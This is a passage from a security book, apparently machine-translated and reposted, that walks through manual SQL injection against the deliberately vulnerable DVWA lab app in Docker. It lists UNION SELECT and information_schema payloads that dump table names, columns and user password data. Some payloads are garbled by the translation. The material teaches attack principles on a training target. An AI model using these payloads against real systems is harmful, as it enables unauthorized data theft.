The four strokes of "11 strokes to cyber security": Low-level DVWA SQL injection

Source: Internet
Author: User
Tags sql injection wrapper docker ps

Taking Dvwa as an example, manual injection helps readers understand the principles and processes of injection.

1. Start Docker and execute the command in the terminal:

Docker Ps-a

Docker start LOCALDVWA

Docker PS

The execution results are shown in 4-19.

?

Figure 4-19 Starting Dvwa

2, enter 127.0.0.1 after entering the browser address bar, the browser opens the Dvwa page (Dvwa has been established in the previous chapters). Click Dvwa Security in the left column to adjust the difficulty to the low level. Click SQL Injection on the left-hand column to enter the SQL injection page, as shown in 4-20.

?

Figure 4-20 DVWA SQL injection

3, follow the prompts in the text box to fill in the User ID (fill in the 1), click the Submit button, the execution of results 4-21 is shown.

?

Figure 4-21 DVWA return Data

4. Returned two fields first name and Sumame. Let's take a look at how the server handles user-submitted data. Click the View Source button in the lower-right corner of the page, shown in 4-22.

?

Figure 4-22 Low level SQL injection code

You can see that the server has not done any processing for the data ID entered by the user, directly for the SQL statement. Manual injection first determine how many fields in the database are used by the page. Then determine the position of each field. Finally, the SQL statement is constructed at the location of the field and injected.

5. First determine the number of fields used, enter 1 ' ORDER by * in the text box. At this point the server accepts the data, $query = "Select First_Name, last_name from Users WHERE user_id= ' 1 ' ORDER by". The next build method is roughly the same, which is equivalent to entering the back half of a legitimate SQL statement and adding it to the server's SQL statement. Click the Submit button to get the results shown in 4-23.

?

Figure 4-23 Test database Field 1

6, can return to the page normally, indicating that at least two fields are referenced (because the page uses get method to submit data, so you can also build SQL statements in the address bar to inject.) Note, however, that spaces and semicolons are converted to ASCII code format. Continue to enter 1 ' ORDER by 3# in the text box and click the Submit button to get the result 4-24 shown.

?

Figure 4-24 Test database Field 2

7. You cannot return to the normal page, stating that the database field applied in the page does not exceed 3. Combine the previous test. You can conclude that the page refers to 2 fields in the database. The next step is to see where the database reference fields are stored. Enter the 1 ' union select 1,2# in the text box. Click the Submit button. Results are shown in 4-25.

?

Figure 4-25 Test field position

As you can see, the first field is shown later, and the second field appears after Sumame. You can now build your own SQL statements for SQL injection. Currently there are 2 locations that can be injected, either one can be selected, here is the second position. In the text box, enter 1 ' union select 1,version () #, which returns the database version, as shown in 4-26.

?

Figure 4-26 returning the database version

8, in the text box Input 1 ' union Select Database (), *. This time, the first field position is injected, and the database name is returned, as shown in 4-27.

?

Figure 4-27 returning the database name

9, known database name, you can query the MySQL information_schema database in the tables table, to get all the tables in the DVWA database. In the text box, enter 1 ' UNION SELECT 1,GROUP_CONCAT (table_name) from Information_schema.tables where table_schema= ' Dvwa ' #, Returns all the tables in the DVWA database, as shown in 4-28.

?

Figure 4-28 returning a table in the database

10, it can be seen that the table in Dvwa has guestbook and users, here needs the contents of the user table. Get the fields in the Users table first. In the text box, enter 1 ' union select 1,GROUP_CONCAT (column_name) from information_schema.columns where table_name= ' user ' #, Returns all fields in the Get table users, as shown in 4-29.

?

Figure 4-29 returning a table field

11, there are many fields returned, Host,user,password,select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv, Reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv , Super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_ Priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv,event_priv,trigger_priv,create_ Tablespace_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_ User_connections,plugin,authentication_string,password_expired,is_role,default_role,max_statement_time. But in fact, the tables in the DVWA database do not have so many fields, and the extra fields are the fields in the users in the MARIADB other database. Now it's time to separate the fields from the table users in the DVWA database. Enter 1 ' and exists (select Host from users) # in the text box to test whether the user field belongs to the table users. The result is returned as shown in 4-30.

?

Figure 4-30 Testing the host field

12. Returned an error message stating that the host field is not a field in the DVWA database table users. Continue to test the user field, enter the 1 ' and exists (select User from users) # in the text box, and return to the result 4-31.

?

Figure 4-31 Testing the user field

13. To return normally, the User field is the field in the DVWA database table users. Go on with this one test. Finally, we get all the fields of the table users in database Dvwa, User_id,first_name,last_name,user,password,avatar,last_login,failed_login.

14. All fields of the table users in the database Dvwa are known. You can now download the data from the table. Enter 1 ' Union Select 1,group_concat (user_id, first_name, last_name, password, avatar, Last_login, Failed_login) from us in the text box ers#, the returned result 4-32 shows.

?

Figure 4-32 Getting table data

If you need to work with other tables, re-process them in this order.

Interested in Welcome to read the book "11 Tricks to play network security-with Python, more secure"

?

The four strokes of "11 strokes to cyber security": Low-level DVWA SQL injection

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.